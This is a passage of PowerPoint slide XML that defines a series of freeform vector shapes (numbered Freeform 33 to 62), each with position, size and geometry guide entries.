                  <a:gd name="T22" fmla="*/ 0 w 1386"/>
                  <a:gd name="T23" fmla="*/ 0 h 753"/>
                  <a:gd name="T24" fmla="*/ 0 w 1386"/>
                  <a:gd name="T25" fmla="*/ 0 h 753"/>
                  <a:gd name="T26" fmla="*/ 0 w 1386"/>
                  <a:gd name="T27" fmla="*/ 0 h 753"/>
                  <a:gd name="T28" fmla="*/ 0 w 1386"/>
                  <a:gd name="T29" fmla="*/ 0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0" name="Freeform 33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="452" y="3236"/>
                <a:ext cx="450" cy="246"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1351"/>
                  <a:gd name="T1" fmla="*/ 0 h 740"/>
                  <a:gd name="T2" fmla="*/ 0 w 1351"/>
                  <a:gd name="T3" fmla="*/ 0 h 740"/>
                  <a:gd name="T4" fmla="*/ 0 w 1351"/>
                  <a:gd name="T5" fmla="*/ 0 h 740"/>
                  <a:gd name="T6" fmla="*/ 0 w 1351"/>
                  <a:gd name="T7" fmla="*/ 0 h 740"/>
                  <a:gd name="T8" fmla="*/ 0 w 1351"/>
                  <a:gd name="T9" fmla="*/ 0 h 740"/>
                  <a:gd name="T10" fmla="*/ 0 w 1351"/>
                  <a:gd name="T11" fmla="*/ 0 h 740"/>
                  <a:gd name="T12" fmla="*/ 0 w 1351"/>
                  <a:gd name="T13" fmla="*/ 0 h 740"/>
                  <a:gd name="T14" fmla="*/ 0 w 1351"/>
                  <a:gd name="T15" fmla="*/ 0 h 740"/>
                  <a:gd name="T16" fmla="*/ 0 w 1351"/>
                  <a:gd name="T17" fmla="*/ 0 h 740"/>
                  <a:gd name="T18" fmla="*/ 0 w 1351"/>
                  <a:gd name="T19" fmla="*/ 0 h 740"/>
                  <a:gd name="T20" fmla="*/ 0 w 1351"/>
                  <a:gd name="T21" fmla="*/ 0 h 740"/>
                  <a:gd name="T22" fmla="*/ 0 w 1351"/>
                  <a:gd name="T23" fmla="*/ 0 h 740"/>
                  <a:gd name="T24" fmla="*/ 0 w 1351"/>
                  <a:gd name="T25" fmla="*/ 0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1" name="Freeform 34"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="799" y="3709"/>
                <a:ext cx="326" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 980"/>
                  <a:gd name="T1" fmla="*/ 0 h 93"/>
                  <a:gd name="T2" fmla="*/ 0 w 980"/>
                  <a:gd name="T3" fmla="*/ 0 h 93"/>
                  <a:gd name="T4" fmla="*/ 0 w 980"/>
                  <a:gd name="T5" fmla="*/ 0 h 93"/>
                  <a:gd name="T6" fmla="*/ 0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2" name="Freeform 35"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="760" y="3028"/>
                <a:ext cx="740" cy="702"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2219"/>
                  <a:gd name="T1" fmla="*/ 0 h 2108"/>
                  <a:gd name="T2" fmla="*/ 0 w 2219"/>
                  <a:gd name="T3" fmla="*/ 0 h 2108"/>
                  <a:gd name="T4" fmla="*/ 0 w 2219"/>
                  <a:gd name="T5" fmla="*/ 0 h 2108"/>
                  <a:gd name="T6" fmla="*/ 0 w 2219"/>
                  <a:gd name="T7" fmla="*/ 0 h 2108"/>
                  <a:gd name="T8" fmla="*/ 0 w 2219"/>
                  <a:gd name="T9" fmla="*/ 0 h 2108"/>
                  <a:gd name="T10" fmla="*/ 0 w 2219"/>
                  <a:gd name="T11" fmla="*/ 0 h 2108"/>
                  <a:gd name="T12" fmla="*/ 0 w 2219"/>
                  <a:gd name="T13" fmla="*/ 0 h 2108"/>
                  <a:gd name="T14" fmla="*/ 0 w 2219"/>
                  <a:gd name="T15" fmla="*/ 0 h 2108"/>
                  <a:gd name="T16" fmla="*/ 0 w 2219"/>
                  <a:gd name="T17" fmla="*/ 0 h 2108"/>
                  <a:gd name="T18" fmla="*/ 0 w 2219"/>
                  <a:gd name="T19" fmla="*/ 0 h 2108"/>
                  <a:gd name="T20" fmla="*/ 0 w 2219"/>
                  <a:gd name="T21" fmla="*/ 0 h 2108"/>
                  <a:gd name="T22" fmla="*/ 0 w 2219"/>
                  <a:gd name="T23" fmla="*/ 0 h 2108"/>
                  <a:gd name="T24" fmla="*/ 0 w 2219"/>
                  <a:gd name="T25" fmla="*/ 0 h 2108"/>
                  <a:gd name="T26" fmla="*/ 0 w 2219"/>
                  <a:gd name="T27" fmla="*/ 0 h 2108"/>
                  <a:gd name="T28" fmla="*/ 0 w 2219"/>
                  <a:gd name="T29" fmla="*/ 0 h 2108"/>
                  <a:gd name="T30" fmla="*/ 0 w 2219"/>
                  <a:gd name="T31" fmla="*/ 0 h 2108"/>
                  <a:gd name="T32" fmla="*/ 0 w 2219"/>
                  <a:gd name="T33" fmla="*/ 0 h 2108"/>
                  <a:gd name="T34" fmla="*/ 0 w 2219"/>
                  <a:gd name="T35" fmla="*/ 0 h 2108"/>
                  <a:gd name="T36" fmla="*/ 0 w 2219"/>
                  <a:gd name="T37" fmla="*/ 0 h 2108"/>
                  <a:gd name="T38" fmla="*/ 0 w 2219"/>
                  <a:gd name="T39" fmla="*/ 0 h 2108"/>
                  <a:gd name="T40" fmla="*/ 0 w 2219"/>
                  <a:gd name="T41" fmla="*/ 0 h 2108"/>
                  <a:gd name="T42" fmla="*/ 0 w 2219"/>
                  <a:gd name="T43" fmla="*/ 0 h 2108"/>
                  <a:gd name="T44" fmla="*/ 0 w 2219"/>
                  <a:gd name="T45" fmla="*/ 0 h 2108"/>
                  <a:gd name="T46" fmla="*/ 0 w 2219"/>
                  <a:gd name="T47" fmla="*/ 0 h 2108"/>
                  <a:gd name="T48" fmla="*/ 0 w 2219"/>
                  <a:gd name="T49" fmla="*/ 0 h 2108"/>
                  <a:gd name="T50" fmla="*/ 0 w 2219"/>
                  <a:gd name="T51" fmla="*/ 0 h 2108"/>
                  <a:gd name="T52" fmla="*/ 0 w 2219"/>
                  <a:gd name="T53" fmla="*/ 0 h 2108"/>
                  <a:gd name="T54" fmla="*/ 0 w 2219"/>
                  <a:gd name="T55" fmla="*/ 0 h 2108"/>
                  <a:gd name="T56" fmla="*/ 0 w 2219"/>
                  <a:gd name="T57" fmla="*/ 0 h 2108"/>
                  <a:gd name="T58" fmla="*/ 0 w 2219"/>
                  <a:gd name="T59" fmla="*/ 0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3" name="Freeform 36"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="498" y="3790"/>
                <a:ext cx="1052" cy="157"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3155"/>
                  <a:gd name="T1" fmla="*/ 0 h 470"/>
                  <a:gd name="T2" fmla="*/ 0 w 3155"/>
                  <a:gd name="T3" fmla="*/ 0 h 470"/>
                  <a:gd name="T4" fmla="*/ 0 w 3155"/>
                  <a:gd name="T5" fmla="*/ 0 h 470"/>
                  <a:gd name="T6" fmla="*/ 0 w 3155"/>
                  <a:gd name="T7" fmla="*/ 0 h 470"/>
                  <a:gd name="T8" fmla="*/ 0 w 3155"/>
                  <a:gd name="T9" fmla="*/ 0 h 470"/>
                  <a:gd name="T10" fmla="*/ 0 w 3155"/>
                  <a:gd name="T11" fmla="*/ 0 h 470"/>
                  <a:gd name="T12" fmla="*/ 0 w 3155"/>
                  <a:gd name="T13" fmla="*/ 0 h 470"/>
                  <a:gd name="T14" fmla="*/ 0 w 3155"/>
                  <a:gd name="T15" fmla="*/ 0 h 470"/>
                  <a:gd name="T16" fmla="*/ 0 w 3155"/>
                  <a:gd name="T17" fmla="*/ 0 h 470"/>
                  <a:gd name="T18" fmla="*/ 0 w 3155"/>
                  <a:gd name="T19" fmla="*/ 0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4" name="Freeform 37"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="828" y="3757"/>
                <a:ext cx="63" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 93"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 93"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 93"/>
                  <a:gd name="T6" fmla="*/ 0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5" name="Freeform 38"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="924" y="3762"/>
                <a:ext cx="60" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 182"/>
                  <a:gd name="T1" fmla="*/ 0 h 98"/>
                  <a:gd name="T2" fmla="*/ 0 w 182"/>
                  <a:gd name="T3" fmla="*/ 0 h 98"/>
                  <a:gd name="T4" fmla="*/ 0 w 182"/>
                  <a:gd name="T5" fmla="*/ 0 h 98"/>
                  <a:gd name="T6" fmla="*/ 0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6" name="Freeform 39"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1033" y="3765"/>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7" name="Freeform 40"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1134" y="3770"/>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8" name="Freeform 41"/>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29" name="Freeform 42"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="967" y="3801"/>
                <a:ext cx="62" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 94"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 94"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 94"/>
                  <a:gd name="T6" fmla="*/ 0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0" name="Freeform 43"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1062" y="3807"/>
                <a:ext cx="61" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 182"/>
                  <a:gd name="T1" fmla="*/ 0 h 97"/>
                  <a:gd name="T2" fmla="*/ 0 w 182"/>
                  <a:gd name="T3" fmla="*/ 0 h 97"/>
                  <a:gd name="T4" fmla="*/ 0 w 182"/>
                  <a:gd name="T5" fmla="*/ 0 h 97"/>
                  <a:gd name="T6" fmla="*/ 0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1" name="Freeform 44"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1171" y="3810"/>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2" name="Freeform 45"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1272" y="3814"/>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3" name="Freeform 46"/>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4" name="Freeform 47"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="652" y="3823"/>
                <a:ext cx="72" cy="36"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 216"/>
                  <a:gd name="T1" fmla="*/ 0 h 108"/>
                  <a:gd name="T2" fmla="*/ 0 w 216"/>
                  <a:gd name="T3" fmla="*/ 0 h 108"/>
                  <a:gd name="T4" fmla="*/ 0 w 216"/>
                  <a:gd name="T5" fmla="*/ 0 h 108"/>
                  <a:gd name="T6" fmla="*/ 0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5" name="Freeform 48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="762" y="3830"/>
                <a:ext cx="71" cy="38"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 212"/>
                  <a:gd name="T1" fmla="*/ 0 h 113"/>
                  <a:gd name="T2" fmla="*/ 0 w 212"/>
                  <a:gd name="T3" fmla="*/ 0 h 113"/>
                  <a:gd name="T4" fmla="*/ 0 w 212"/>
                  <a:gd name="T5" fmla="*/ 0 h 113"/>
                  <a:gd name="T6" fmla="*/ 0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6" name="Freeform 49"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="888" y="3833"/>
                <a:ext cx="61" cy="43"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 184"/>
                  <a:gd name="T1" fmla="*/ 0 h 128"/>
                  <a:gd name="T2" fmla="*/ 0 w 184"/>
                  <a:gd name="T3" fmla="*/ 0 h 128"/>
                  <a:gd name="T4" fmla="*/ 0 w 184"/>
                  <a:gd name="T5" fmla="*/ 0 h 128"/>
                  <a:gd name="T6" fmla="*/ 0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7" name="Freeform 50"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1005" y="3838"/>
                <a:ext cx="50" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 151"/>
                  <a:gd name="T1" fmla="*/ 0 h 126"/>
                  <a:gd name="T2" fmla="*/ 0 w 151"/>
                  <a:gd name="T3" fmla="*/ 0 h 126"/>
                  <a:gd name="T4" fmla="*/ 0 w 151"/>
                  <a:gd name="T5" fmla="*/ 0 h 126"/>
                  <a:gd name="T6" fmla="*/ 0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8" name="Freeform 51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1131" y="3849"/>
                <a:ext cx="46" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 138"/>
                  <a:gd name="T1" fmla="*/ 0 h 97"/>
                  <a:gd name="T2" fmla="*/ 0 w 138"/>
                  <a:gd name="T3" fmla="*/ 0 h 97"/>
                  <a:gd name="T4" fmla="*/ 0 w 138"/>
                  <a:gd name="T5" fmla="*/ 0 h 97"/>
                  <a:gd name="T6" fmla="*/ 0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39" name="Freeform 52"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="758" y="3054"/>
                <a:ext cx="89" cy="99"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 267"/>
                  <a:gd name="T1" fmla="*/ 0 h 295"/>
                  <a:gd name="T2" fmla="*/ 0 w 267"/>
                  <a:gd name="T3" fmla="*/ 0 h 295"/>
                  <a:gd name="T4" fmla="*/ 0 w 267"/>
                  <a:gd name="T5" fmla="*/ 0 h 295"/>
                  <a:gd name="T6" fmla="*/ 0 w 267"/>
                  <a:gd name="T7" fmla="*/ 0 h 295"/>
                  <a:gd name="T8" fmla="*/ 0 w 267"/>
                  <a:gd name="T9" fmla="*/ 0 h 295"/>
                  <a:gd name="T10" fmla="*/ 0 w 267"/>
                  <a:gd name="T11" fmla="*/ 0 h 295"/>
                  <a:gd name="T12" fmla="*/ 0 w 267"/>
                  <a:gd name="T13" fmla="*/ 0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0" name="Freeform 53"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1267" y="3044"/>
                <a:ext cx="108" cy="128"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 324"/>
                  <a:gd name="T1" fmla="*/ 0 h 383"/>
                  <a:gd name="T2" fmla="*/ 0 w 324"/>
                  <a:gd name="T3" fmla="*/ 0 h 383"/>
                  <a:gd name="T4" fmla="*/ 0 w 324"/>
                  <a:gd name="T5" fmla="*/ 0 h 383"/>
                  <a:gd name="T6" fmla="*/ 0 w 324"/>
                  <a:gd name="T7" fmla="*/ 0 h 383"/>
                  <a:gd name="T8" fmla="*/ 0 w 324"/>
                  <a:gd name="T9" fmla="*/ 0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1" name="Freeform 54"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="820" y="3278"/>
                <a:ext cx="490" cy="315"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1471"/>
                  <a:gd name="T1" fmla="*/ 0 h 944"/>
                  <a:gd name="T2" fmla="*/ 0 w 1471"/>
                  <a:gd name="T3" fmla="*/ 0 h 944"/>
                  <a:gd name="T4" fmla="*/ 0 w 1471"/>
                  <a:gd name="T5" fmla="*/ 0 h 944"/>
                  <a:gd name="T6" fmla="*/ 0 w 1471"/>
                  <a:gd name="T7" fmla="*/ 0 h 944"/>
                  <a:gd name="T8" fmla="*/ 0 w 1471"/>
                  <a:gd name="T9" fmla="*/ 0 h 944"/>
                  <a:gd name="T10" fmla="*/ 0 w 1471"/>
                  <a:gd name="T11" fmla="*/ 0 h 944"/>
                  <a:gd name="T12" fmla="*/ 0 w 1471"/>
                  <a:gd name="T13" fmla="*/ 0 h 944"/>
                  <a:gd name="T14" fmla="*/ 0 w 1471"/>
                  <a:gd name="T15" fmla="*/ 0 h 944"/>
                  <a:gd name="T16" fmla="*/ 0 w 1471"/>
                  <a:gd name="T17" fmla="*/ 0 h 944"/>
                  <a:gd name="T18" fmla="*/ 0 w 1471"/>
                  <a:gd name="T19" fmla="*/ 0 h 944"/>
                  <a:gd name="T20" fmla="*/ 0 w 1471"/>
                  <a:gd name="T21" fmla="*/ 0 h 944"/>
                  <a:gd name="T22" fmla="*/ 0 w 1471"/>
                  <a:gd name="T23" fmla="*/ 0 h 944"/>
                  <a:gd name="T24" fmla="*/ 0 w 1471"/>
                  <a:gd name="T25" fmla="*/ 0 h 944"/>
                  <a:gd name="T26" fmla="*/ 0 w 1471"/>
                  <a:gd name="T27" fmla="*/ 0 h 944"/>
                  <a:gd name="T28" fmla="*/ 0 w 1471"/>
                  <a:gd name="T29" fmla="*/ 0 h 944"/>
                  <a:gd name="T30" fmla="*/ 0 w 1471"/>
                  <a:gd name="T31" fmla="*/ 0 h 944"/>
                  <a:gd name="T32" fmla="*/ 0 w 1471"/>
                  <a:gd name="T33" fmla="*/ 0 h 944"/>
                  <a:gd name="T34" fmla="*/ 0 w 1471"/>
                  <a:gd name="T35" fmla="*/ 0 h 944"/>
                  <a:gd name="T36" fmla="*/ 0 w 1471"/>
                  <a:gd name="T37" fmla="*/ 0 h 944"/>
                  <a:gd name="T38" fmla="*/ 0 w 1471"/>
                  <a:gd name="T39" fmla="*/ 0 h 944"/>
                  <a:gd name="T40" fmla="*/ 0 w 1471"/>
                  <a:gd name="T41" fmla="*/ 0 h 944"/>
                  <a:gd name="T42" fmla="*/ 0 w 1471"/>
                  <a:gd name="T43" fmla="*/ 0 h 944"/>
                  <a:gd name="T44" fmla="*/ 0 w 1471"/>
                  <a:gd name="T45" fmla="*/ 0 h 944"/>
                  <a:gd name="T46" fmla="*/ 0 w 1471"/>
                  <a:gd name="T47" fmla="*/ 0 h 944"/>
                  <a:gd name="T48" fmla="*/ 0 w 1471"/>
                  <a:gd name="T49" fmla="*/ 0 h 944"/>
                  <a:gd name="T50" fmla="*/ 0 w 1471"/>
                  <a:gd name="T51" fmla="*/ 0 h 944"/>
                  <a:gd name="T52" fmla="*/ 0 w 1471"/>
                  <a:gd name="T53" fmla="*/ 0 h 944"/>
                  <a:gd name="T54" fmla="*/ 0 w 1471"/>
                  <a:gd name="T55" fmla="*/ 0 h 944"/>
                  <a:gd name="T56" fmla="*/ 0 w 1471"/>
                  <a:gd name="T57" fmla="*/ 0 h 944"/>
                  <a:gd name="T58" fmla="*/ 0 w 1471"/>
                  <a:gd name="T59" fmla="*/ 0 h 944"/>
                  <a:gd name="T60" fmla="*/ 0 w 1471"/>
                  <a:gd name="T61" fmla="*/ 0 h 944"/>
                  <a:gd name="T62" fmla="*/ 0 w 1471"/>
                  <a:gd name="T63" fmla="*/ 0 h 944"/>
                  <a:gd name="T64" fmla="*/ 0 w 1471"/>
                  <a:gd name="T65" fmla="*/ 0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2" name="Freeform 55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="904" y="3400"/>
                <a:ext cx="341" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1023"/>
                  <a:gd name="T1" fmla="*/ 0 h 182"/>
                  <a:gd name="T2" fmla="*/ 0 w 1023"/>
                  <a:gd name="T3" fmla="*/ 0 h 182"/>
                  <a:gd name="T4" fmla="*/ 0 w 1023"/>
                  <a:gd name="T5" fmla="*/ 0 h 182"/>
                  <a:gd name="T6" fmla="*/ 0 w 1023"/>
                  <a:gd name="T7" fmla="*/ 0 h 182"/>
                  <a:gd name="T8" fmla="*/ 0 w 1023"/>
                  <a:gd name="T9" fmla="*/ 0 h 182"/>
                  <a:gd name="T10" fmla="*/ 0 w 1023"/>
                  <a:gd name="T11" fmla="*/ 0 h 182"/>
                  <a:gd name="T12" fmla="*/ 0 w 1023"/>
                  <a:gd name="T13" fmla="*/ 0 h 182"/>
                  <a:gd name="T14" fmla="*/ 0 w 1023"/>
                  <a:gd name="T15" fmla="*/ 0 h 182"/>
                  <a:gd name="T16" fmla="*/ 0 w 1023"/>
                  <a:gd name="T17" fmla="*/ 0 h 182"/>
                  <a:gd name="T18" fmla="*/ 0 w 1023"/>
                  <a:gd name="T19" fmla="*/ 0 h 182"/>
                  <a:gd name="T20" fmla="*/ 0 w 1023"/>
                  <a:gd name="T21" fmla="*/ 0 h 182"/>
                  <a:gd name="T22" fmla="*/ 0 w 1023"/>
                  <a:gd name="T23" fmla="*/ 0 h 182"/>
                  <a:gd name="T24" fmla="*/ 0 w 1023"/>
                  <a:gd name="T25" fmla="*/ 0 h 182"/>
                  <a:gd name="T26" fmla="*/ 0 w 1023"/>
                  <a:gd name="T27" fmla="*/ 0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3" name="Freeform 56"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="872" y="3127"/>
                <a:ext cx="64" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 194"/>
                  <a:gd name="T1" fmla="*/ 0 h 192"/>
                  <a:gd name="T2" fmla="*/ 0 w 194"/>
                  <a:gd name="T3" fmla="*/ 0 h 192"/>
                  <a:gd name="T4" fmla="*/ 0 w 194"/>
                  <a:gd name="T5" fmla="*/ 0 h 192"/>
                  <a:gd name="T6" fmla="*/ 0 w 194"/>
                  <a:gd name="T7" fmla="*/ 0 h 192"/>
                  <a:gd name="T8" fmla="*/ 0 w 194"/>
                  <a:gd name="T9" fmla="*/ 0 h 192"/>
                  <a:gd name="T10" fmla="*/ 0 w 194"/>
                  <a:gd name="T11" fmla="*/ 0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4" name="Freeform 57"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1196" y="3120"/>
                <a:ext cx="63" cy="87"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 261"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 261"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 0 h 261"/>
                  <a:gd name="T6" fmla="*/ 0 w 187"/>
                  <a:gd name="T7" fmla="*/ 0 h 261"/>
                  <a:gd name="T8" fmla="*/ 0 w 187"/>
                  <a:gd name="T9" fmla="*/ 0 h 261"/>
                  <a:gd name="T10" fmla="*/ 0 w 187"/>
                  <a:gd name="T11" fmla="*/ 0 h 261"/>
                  <a:gd name="T12" fmla="*/ 0 w 187"/>
                  <a:gd name="T13" fmla="*/ 0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5" name="Freeform 58"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1029" y="3308"/>
                <a:ext cx="85" cy="4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6" name="Freeform 59"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="903" y="3256"/>
                <a:ext cx="93" cy="54"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 277"/>
                  <a:gd name="T1" fmla="*/ 0 h 162"/>
                  <a:gd name="T2" fmla="*/ 0 w 277"/>
                  <a:gd name="T3" fmla="*/ 0 h 162"/>
                  <a:gd name="T4" fmla="*/ 0 w 277"/>
                  <a:gd name="T5" fmla="*/ 0 h 162"/>
                  <a:gd name="T6" fmla="*/ 0 w 277"/>
                  <a:gd name="T7" fmla="*/ 0 h 162"/>
                  <a:gd name="T8" fmla="*/ 0 w 277"/>
                  <a:gd name="T9" fmla="*/ 0 h 162"/>
                  <a:gd name="T10" fmla="*/ 0 w 277"/>
                  <a:gd name="T11" fmla="*/ 0 h 162"/>
                  <a:gd name="T12" fmla="*/ 0 w 277"/>
                  <a:gd name="T13" fmla="*/ 0 h 162"/>
                  <a:gd name="T14" fmla="*/ 0 w 277"/>
                  <a:gd name="T15" fmla="*/ 0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7" name="Freeform 60"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1158" y="3270"/>
                <a:ext cx="99" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 298"/>
                  <a:gd name="T1" fmla="*/ 0 h 147"/>
                  <a:gd name="T2" fmla="*/ 0 w 298"/>
                  <a:gd name="T3" fmla="*/ 0 h 147"/>
                  <a:gd name="T4" fmla="*/ 0 w 298"/>
                  <a:gd name="T5" fmla="*/ 0 h 147"/>
                  <a:gd name="T6" fmla="*/ 0 w 298"/>
                  <a:gd name="T7" fmla="*/ 0 h 147"/>
                  <a:gd name="T8" fmla="*/ 0 w 298"/>
                  <a:gd name="T9" fmla="*/ 0 h 147"/>
                  <a:gd name="T10" fmla="*/ 0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8" name="Freeform 61"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="849" y="3189"/>
                <a:ext cx="112" cy="83"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 335"/>
                  <a:gd name="T1" fmla="*/ 0 h 249"/>
                  <a:gd name="T2" fmla="*/ 0 w 335"/>
                  <a:gd name="T3" fmla="*/ 0 h 249"/>
                  <a:gd name="T4" fmla="*/ 0 w 335"/>
                  <a:gd name="T5" fmla="*/ 0 h 249"/>
                  <a:gd name="T6" fmla="*/ 0 w 335"/>
                  <a:gd name="T7" fmla="*/ 0 h 249"/>
                  <a:gd name="T8" fmla="*/ 0 w 335"/>
                  <a:gd name="T9" fmla="*/ 0 h 249"/>
                  <a:gd name="T10" fmla="*/ 0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49" name="Freeform 62"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1141" y="3196"/>
                <a:ext cx="128" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 385"/>
                  <a:gd name="T1" fmla="*/ 0 h 191"/>
                  <a:gd name="T2" fmla="*/ 0 w 385"/>
                  <a:gd name="T3" fmla="*/ 0 h 191"/>
                  <a:gd name="T4" fmla="*/ 0 w 385"/>
                  <a:gd name="T5" fmla="*/ 0 h 191"/>
                  <a:gd name="T6" fmla="*/ 0 w 385"/>
                  <a:gd name="T7" fmla="*/ 0 h 191"/>
                  <a:gd name="T8" fmla="*/ 0 w 385"/>
                  <a:gd name="T9" fmla="*/ 0 h 191"/>
                  <a:gd name="T10" fmla="*/ 0 w 385"/>
                  <a:gd name="T11" fmla="*/ 0 h 191"/>
